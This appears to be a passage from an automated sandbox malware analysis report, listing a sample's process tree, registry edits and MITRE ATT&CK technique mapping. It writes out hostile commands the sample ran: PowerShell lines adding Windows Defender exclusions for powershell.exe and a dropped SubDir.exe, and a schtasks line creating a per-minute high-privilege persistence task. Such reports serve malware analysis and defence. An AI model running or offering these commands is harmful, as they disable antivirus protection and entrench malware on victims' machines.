        Reg.exe add "HKCR\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" /v "System.IsPinnedToNameSpaceTree" /t REG_DWORD /d "0" /f
        8⤵
        Modifies registry class
        
        PID:2428
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCR\Wow6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" /v "System.IsPinnedToNameSpaceTree" /t REG_DWORD /d "0" /f
        8⤵
        Modifies registry class
        
        PID:4552
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKCU\Software\Microsoft\Shell\USB" /v "NotifyOnWeakCharger" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:4540
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "DelayedAckFrequency" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4328
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "DelayedAckTicks" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:1392
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "CongestionAlgorithm" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:3852
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "MultihopSets" /t REG_DWORD /d "15" /f
        8⤵
        
        PID:3728
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "FastCopyReceiveThreshold" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:2512
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v "FastSendDatagramThreshold" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:1500
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "DefaultReceiveWindow" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:2592
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "DefaultSendWindow" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:2072
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "FastCopyReceiveThreshold" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:4416
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "FastSendDatagramThreshold" /t REG_DWORD /d "16384" /f
        8⤵
        
        PID:1916
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "DynamicSendBufferDisable" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3412
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "IgnorePushBitOnReceives" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:4548
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "NonBlockingSendSpecialBuffering" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:3360
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\AFD\Parameters" /v "DisableRawSecurity" /t REG_DWORD /d "1" /f
        8⤵
        
        PID:2708
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "SystemResponsiveness" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:2940
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\ControlSet001\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d "0" /f
        8⤵
        
        PID:3668
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "LocalPriority" /t REG_DWORD /d "4" /f
        8⤵
        
        PID:1376
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "HostsPriority" /t REG_DWORD /d "5" /f
        8⤵
        
        PID:3700
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "DnsPriority" /t REG_DWORD /d "6" /f
        8⤵
        
        PID:1364
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "NetbtPriority" /t REG_DWORD /d "7" /f
        8⤵
        
        PID:2096
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "LocalPriority" /t REG_DWORD /d "4" /f
        8⤵
        
        PID:3120
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "HostsPriority" /t REG_DWORD /d "5" /f
        8⤵
        
        PID:2740
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "DnsPriority" /t REG_DWORD /d "6" /f
        8⤵
        
        PID:216
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "NetbtPriority" /t REG_DWORD /d "7" /f
        8⤵
        
        PID:4828
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "LocalPriority" /t REG_DWORD /d "4" /f
        8⤵
        
        PID:1632
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "HostsPriority" /t REG_DWORD /d "5" /f
        8⤵
        
        PID:4900
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "DnsPriority" /t REG_DWORD /d "6" /f
        8⤵
        
        PID:4296
        
        C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider" /v "NetbtPriority" /t REG_DWORD /d "7" /f
        8⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\dsfsdfs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dsfsdfs.exe"
        7⤵
        Executes dropped EXE
        
        PID:2364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\SubDir.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SubDir.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:820
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SubDir" /tr "C:\Users\Admin\AppData\Roaming\SubDir.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:5076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3108

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:4708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
- Checks SCSI registry key(s)
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry